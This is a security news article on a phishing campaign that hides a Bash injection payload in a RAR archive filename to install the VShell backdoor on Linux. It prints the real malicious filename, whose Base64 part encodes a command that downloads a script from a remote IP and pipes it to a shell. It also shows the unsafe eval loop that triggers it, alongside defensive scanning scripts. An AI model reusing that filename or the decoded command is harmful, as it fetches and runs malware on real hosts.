Linux environments, long considered bastions of security, are facing a sophisticated new threat that challenges traditional assumptions about operating system safety.
A recently discovered malware campaign exploits an ingenious attack vector that weaponizes RAR archive filenames to deliver the VShell backdoor, demonstrating how attackers are evolving beyond conventional exploitation techniques to target scripting patterns and file metadata.
The attack begins with a seemingly innocuous spam email disguised as a beauty product survey invitation, offering a small monetary reward to entice victims.
Unlike traditional phishing campaigns that focus on credential theft or brand impersonation, this social engineering approach exploits user curiosity while delivering a malicious RAR archive attachment.
The archive contains a file with a specially crafted filename that serves as a dormant payload, waiting to execute when processed by common shell operations.
What makes this attack particularly insidious is its exploitation of dangerous patterns prevalent in Linux shell scripts.
Trellix researchers identified that the malicious filename contains embedded Bash-compatible code designed to execute commands when interpreted by the shell during routine operations such as directory enumeration or file listing.
The filename itself acts as a payload trigger, bypassing traditional security defenses that typically focus on file content rather than metadata.
The weaponized filename is structured as a shell command injection payload: it only becomes a command once the shell expands it.
When extracted, the archive reveals a file named ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash, which cannot be created by typing it at an ordinary shell prompt, because its special characters would be interpreted as command syntax.
This filename was likely crafted using external tools or programming languages to bypass shell input validation.
Infection Mechanism and Execution Chain
The infection triggers when shell scripts process the malicious filename through common operations like for f in *; do eval "echo $f"; done.
Multiple trigger vectors exist, including file listing operations with eval functions, find commands with eval parameters, and xargs processing with shell expansion.
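The script below is an added example, not code from the Trellix report or from the campaign. It covers both points made above from the defender's side: the hardened counterpart of the enumeration patterns (names are only ever passed as data, never through eval), and a scanner that flags extracted names carrying shell syntax, which is the filename-as-payload point. The function names, the heuristic rule list and the sample names in the comments are this example's own choices; it is plain POSIX sh with no bash-isms.

```shell
#!/bin/sh
# Added example, not code from the Trellix write-up. Two things a defender
# can do with the filename itself: enumerate a directory without ever
# re-parsing names as code, and flag names that carry shell syntax before
# any other script touches them. POSIX sh; no bash-isms.

# The pattern the article warns about, kept only for comparison and never
# called here: the name is pasted into a string that eval parses a second
# time, so {a,b}, $(...), pipes and separators inside the name become code.
#   for f in *; do eval "echo $f"; done

NL=$(printf '\nx'); NL=${NL%x}   # literal newline, for pattern matching
TAB=$(printf '\t')

# is_suspicious_name NAME -> prints a reason and returns 0 if NAME looks like
# shell syntax; returns 1 otherwise. The last rule is a weak hint (keyword
# matches such as base64 or a _bash suffix), the others are hard markers.
is_suspicious_name() {
    reason=
    case "$1" in
        *'{'*,*'}'*)           reason='brace expansion' ;;
        *'$('*|*'`'*)          reason='command substitution' ;;
        *'|'*|*';'*|*'&'*)     reason='pipe or command separator' ;;
        *"$NL"*|*"$TAB"*)      reason='control character' ;;
        *base64*|*_bash|*_sh)  reason='decoder/interpreter keyword' ;;
    esac
    [ -n "$reason" ] || return 1
    printf '%s: %s\n' "$reason" "$1"
}

# safe_list DIR -> one name per line. The name is only ever an argument to
# printf, so it is printed byte for byte; dotfiles are included, an empty
# glob is skipped, and nothing is re-parsed.
safe_list() {
    for f in "$1"/* "$1"/.[!.]* "$1"/..?*; do
        [ -e "$f" ] || [ -L "$f" ] || continue
        printf '%s\n' "${f##*/}"
    done
}

# scan_dir DIR -> returns 0 when every name is clean, 1 when at least one
# needs review (usable as a gate: scan_dir extracted/ && process extracted/)
scan_dir() {
    found=0
    for f in "$1"/* "$1"/.[!.]* "$1"/..?*; do
        [ -e "$f" ] || [ -L "$f" ] || continue
        if is_suspicious_name "${f##*/}"; then found=1; fi
    done
    return "$found"
}

# usage: sh scan_names.sh DIR   (lists the names, then exits 1 if any is flagged)
if [ $# -gt 0 ]; then
    safe_list "$1"
    scan_dir "$1"
fi
```

The same quoting discipline applies to the other trigger vectors the article lists: with find, pass the path as an argument (find DIR -exec cmd {} +) rather than into an eval'd string, and with xargs use -0 together with find -print0 so a name containing spaces, newlines or metacharacters arrives as one argv element. The keyword rule will produce false positives on legitimate names such as base64_notes.txt; treat its hits as items to review, not verdicts.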
The embedded payload uses a multi-stage approach: the filename expands to a Base64-decoded command that is piped directly to bash.
Once triggered, the initial stage downloads a second-stage script that detects system architecture and fetches the appropriate ELF binary for x86, x64, ARM, or ARM64 systems.
The final payload, VShell, operates entirely in memory using fexecve() to avoid disk-based detection while masquerading as legitimate kernel threads like [kworker/0:2].
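As an added example (not the researchers' code), the following POSIX sh check looks at the masquerade described above from the detection side. It walks a /proc tree and flags processes whose argv is bracketed like a kernel thread, or whose exe link points at an in-memory image (a memfd target marked deleted), which is what a binary started from memory rather than from disk leaves behind. The PROC_ROOT parameter, the function name and the constructed tree used to exercise it are this example's own; on a live host it is run against /proc.

```shell
#!/bin/sh
# Added example, not from the Trellix write-up. Looks for user-space
# processes dressed up as kernel threads, the masquerade the article
# describes ([kworker/0:2]). Two /proc facts drive it: a real kernel thread
# has an empty /proc/PID/cmdline, and a binary run from memory has an exe
# link that points at a memfd target marked "(deleted)" rather than at a
# file on disk. PROC_ROOT is a parameter so the logic can be exercised
# against a constructed tree; on a live host pass /proc (or nothing).

# find_fake_kthreads [PROC_ROOT] -> prints "PID reason detail" for each
# suspect; returns 0 when nothing was flagged, 1 otherwise.
find_fake_kthreads() {
    root=${1:-/proc}
    found=0
    for d in "$root"/[0-9]*; do
        [ -r "$d/cmdline" ] || continue
        pid=${d##*/}
        # NUL-separated argv -> space-separated string; empty for kernel threads
        cmd=$(tr '\000' ' ' < "$d/cmdline")
        case "$cmd" in
            '['*)
                # a real kernel thread has no argv at all, so a bracketed
                # argv[0] is a user process borrowing the kernel-thread look
                printf '%s bracketed-name-with-argv %s\n' "$pid" "$cmd"
                found=1
                continue ;;
        esac
        # exe is unreadable for kernel threads and for other users' processes;
        # readlink then returns nothing and the process is skipped
        exe=$(readlink "$d/exe" 2>/dev/null) || exe=
        case "$exe" in
            *memfd:*|*'(deleted)'*)
                printf '%s in-memory-exe %s\n' "$pid" "$exe"
                found=1 ;;
        esac
    done
    return "$found"
}

# usage: sh fake_kthreads.sh [PROC_ROOT]
if [ $# -gt 0 ]; then
    find_fake_kthreads "$1"
fi
```

Run as root so every process's exe link is readable, and treat hits as leads rather than verdicts: an exe marked "(deleted)" also shows up when a package upgrade replaces a binary that is still running, so confirm a hit by checking the parent (genuine kernel threads descend from kthreadd, PID 2) and the memory maps before acting on it.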
This sophisticated evasion technique demonstrates the evolution of Linux-targeted malware toward more stealthy, memory-resident operations that challenge traditional security paradigms.